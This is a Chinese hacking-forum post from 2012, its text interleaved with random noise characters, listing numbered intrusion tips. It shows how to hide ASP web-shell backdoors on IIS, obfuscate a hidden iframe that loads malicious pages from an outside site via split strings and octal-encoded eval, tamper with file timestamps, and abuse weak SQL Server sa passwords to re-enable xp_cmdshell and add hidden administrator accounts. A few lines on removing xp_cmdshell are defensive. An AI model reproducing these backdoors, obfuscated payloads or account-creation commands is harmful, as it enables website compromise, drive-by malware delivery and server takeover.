4 @' q1 G* i6 N8 s" Z2 E: w+ P53、隐藏ASP后门的两种方法' o. o* U/ S; x$ P: \6 c0 `, p8 g
1、建立非标准目录:mkdir images..\7 d( q& E5 U7 _9 g' R/ B
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp6 A: x" H$ d1 o6 i7 v3 R- N% `# x1 L: K
通过web访问ASP木马:http://ip/images../news.asp?action=login% z% o: S% ~5 v1 K( R4 w% r/ ]
如何删除非标准目录:rmdir images..\ /s
. j* E$ z( ^' g: L {4 v2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
0 t- _ J3 V8 y/ v6 C4 L0 j3 omkdir programme.asp
! z( T& j/ |9 d" m. L' w+ g新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 {0 `1 [: y t新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件6 w2 e- z8 X' n5 J
attrib +H +S programme.asp
; r+ Z5 N: s5 B' t9 Q9 l6 d通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: p- d' u" ^: _: [
$ F5 V% I/ ^. n5 _
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 {- D% |- E1 I- ~& t9 j* S然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; O1 y* q0 v( Z) W4 c) N1 @, [4 A% k% f# v( k, Y
55、JS隐蔽挂马- E7 @8 x" {7 g- C
1.- h+ A. M' `0 U$ r
var tr4c3="<iframe src=ht";
; R$ l& k% V3 Y6 a" Itr4c3 = tr4c3+"tp:/";8 J; M* v% @( ^3 |+ C
tr4c3 = tr4c3+"/ww";
( a- ?. Q v- v! p( i+ a Z& Otr4c3 = tr4c3+"w.tr4";5 }. t0 o7 }2 n5 k; D1 n
tr4c3 = tr4c3+"c3.com/inc/m";' N7 m1 n% [# n8 C: {1 Z
tr4c3 = tr4c3+"m.htm style="display:none"></i";
. D& I. S% C4 t2 w$ M& W; Q' xtr4c3 =tr4c3+"frame>'";1 O/ t% B9 j& N9 H/ X2 ~& T
document.write(tr4c3);
( x. U+ J4 C0 l) ?- U7 h1 R: d6 o避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
y8 m; R) W; w( Z- I7 r( P. Y% J, K" i
2.2 F1 h @( k4 g; T5 K: f% g
转换进制,然后用EVAL执行。如4 N& n& f" x7 \9 F! c9 t
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& X% c$ R2 s9 \, U5 N6 B# O8 J( L不过这个有点显眼。( W" X' W0 G$ T' q2 l9 U4 m+ [
3.) v! d2 x" W$ e* r2 }1 l
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');5 o% C! O0 L) P
最后一点,别忘了把文件的时间也修改下。
8 o2 O( t, k* h- O+ H, d, G( s a& X
56.3389终端入侵常用DOS命令- u" q- M. k9 i4 y- h5 j& q
taskkill taskkill /PID 1248 /t% J" n/ X9 W" b u$ Y$ B9 ^+ _
2 ]2 Y' A& b' D
tasklist 查进程: Z B1 c, d% X4 r" d8 C* I% ^: f' b
/ W; [ k- ?$ V2 ~cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限9 `! v1 [6 I5 V) |" I
iisreset /reboot
: W. }7 q; f, w# U% Xtsshutdn /reboot /delay:1 重起服务器
z0 l# e2 |: |6 }; P+ _4 J/ d% d+ e0 i& h
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
( w) t& v3 w8 ^5 B. r/ l4 i% X
/ w/ R# D/ Z1 ]8 U4 F8 ]0 ^query user 查看当前终端用户在线情况
: j! @% f& k2 t3 q& s. k7 A% f! e5 [! U3 G& k; U
要显示有关所有会话使用的进程的信息,请键入:query process *5 D C6 Q/ @, K! i0 b
3 {' f2 Z. a. f1 z; @& J/ v
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:22 n% Y0 @. x1 g1 e! b" v+ |' s) i4 Q
2 q+ G4 Q: g& @- l要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, {; m6 g/ n/ z( T8 E6 Q9 a
, C. E; g6 u7 p
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 l( x5 _2 w) v/ y
: G! G0 P3 T4 A( I4 ^) Q6 U命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% r w4 n% [/ D1 J
, ?& A$ h. e) X* S6 Y F& e0 U命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统' ~. i1 r( S. D$ A/ K, w+ d0 t9 \% K+ u
, F. ]7 X: s5 f! P# Q" L t3 B命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。! u7 N# @- n7 [4 ~0 h I
& Z/ C- C' L8 x2 b9 {* C
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
* o S0 L5 ? ~: F+ w/ |* [2 B& |& \5 q- B8 y2 t
56、在地址栏或按Ctrl+O,输入:9 ~% i7 ?1 O- |" z: _) V& Q
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
! I' ?( m7 |* j/ R% U$ {5 M7 i5 `5 W4 F
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' n7 C3 \9 |# \8 t7 o, h3 B
! Q! ?, O3 C) J% J t8 M57、net user的时候,是不能显示加$的用户,但是如果不处理的话,/ \: S% c/ R( y4 J6 M
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 l1 m* @8 M1 D0 V# j7 P* l8 o( l2 o( C, d# a1 T
58、 sa弱口令相关命令
: u( ]+ U7 r5 N, |+ a
2 q/ j: K0 @( I/ j# T, M& k2 I" L一.更改sa口令方法:' }6 s& ~3 @3 P% G* E4 Z4 T" z' r. d
用sql综合利用工具连接后,执行命令:7 u, n; x; x9 Z: o5 h% `8 d
exec sp_password NULL,'20001001','sa'
+ R3 R' h+ P, B(提示:慎用!)
# W" @# D1 h8 F8 T1 K4 q2 z* k
4 `0 q2 J' _ w# q; t* B8 ^" p7 p二.简单修补sa弱口令.
! g, `8 g! c7 V" S v R' `
) N% u0 T n( ]% ~+ D' [5 h; P; S方法1:查询分离器连接后执行:7 H/ I4 Z% }* g" G+ ?* N6 Q
if exists (select * from5 s, A8 J3 v& f+ C3 I5 d
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
) R) k# q: u5 W1 r/ {OBJECTPROPERTY(id, N'IsExtendedProc') = 1): }1 }6 M, e9 ^
$ A- S( v8 R2 z& V& nexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'4 T2 T w: \7 W! E1 C4 j/ v
0 z$ k/ w3 X$ L1 Z' ?$ Q$ T4 S
GO6 }% m5 M. \+ N5 i% ]% y
2 Y4 ?9 A5 R& d) U然后按F5键命令执行完毕0 J) I3 L# h, Q- R3 g% I' G3 w: z
0 h: I: y. m! W" g, M5 R方法2:查询分离器连接后8 E9 r0 p* ^' v @* L& ^
第一步执行:use master- m! X- V# A6 S
第二步执行:sp_dropextendedproc 'xp_cmdshell'( r4 D; l5 P) s- N7 J6 W1 ~2 A
然后按F5键命令执行完毕
. \! _9 H6 e+ t' T
! Z9 X4 w7 x# c6 m) X: s5 b/ L6 [& _6 G: v' n
三.常见情况恢复执行xp_cmdshell.
4 d' P: b& |% e5 S* ^, k) g+ x3 @4 U7 Z7 Q
# G* k4 b7 ?6 U- x5 e1 未能找到存储过程'master..xpcmdshell'.& F- Y# T; l. y3 |. l- ]+ j U
恢复方法:查询分离器连接后,
% R! N: B3 v* P; O6 n( a( v: n第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; n( u/ S& H, ]: ~* a( m$ |第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" c3 s" Z' l% q$ d# c然后按F5键命令执行完毕
# e& K; x4 y/ z6 [/ i: p. V2 e* b& W$ s) ^
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): z. ~ {8 L5 s( F0 {# Z' _
恢复方法:查询分离器连接后,6 t8 D* W8 A- ?! E+ L6 U
第一步执行:sp_dropextendedproc "xp_cmdshell". Y% Z* K n- f/ v
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
. r9 j9 b/ b p. d. k3 [然后按F5键命令执行完毕; h- P+ P5 c; @, M+ J% L
2 `$ W2 \2 H3 C
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 \; \; ~8 ?% }: N: a! I恢复方法:查询分离器连接后,& `5 y% T4 K' a* e4 y/ l8 V; z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. D/ R+ a5 j1 q5 L# g. e7 V
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# s( J n6 `. ^% ^: W0 ~然后按F5键命令执行完毕" x2 _2 h# a/ k* x% \( R5 c
! f4 x- N1 {; {, W* V* S
四.终极方法.
' i- g p4 |/ g \0 o如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& l+ V# k' _* d1 m: N# N( K查询分离器连接后,
6 c, [' p; ]% S& ^/ H- U" K' o$ v2000servser系统:
Y5 g3 ^: n; k- ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add': `+ {3 l! \: q3 [
& Q/ b$ C4 U+ o; l) w/ {6 [1 O' W# G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* }# R9 n1 ?- Q, P; o2 [6 o* U6 }
K" W. w- u3 J. [xp或2003server系统:
$ f w+ S1 Z8 u' y* l2 c/ m3 b9 j" v4 i+ _) d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
, W' B! W& d, Y. C2 f+ D4 c' {8 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 x0 j1 o8 T3 p M! K2 J+ v k
|
发表于 2012-9-15 14:13:15
收藏
支持
反对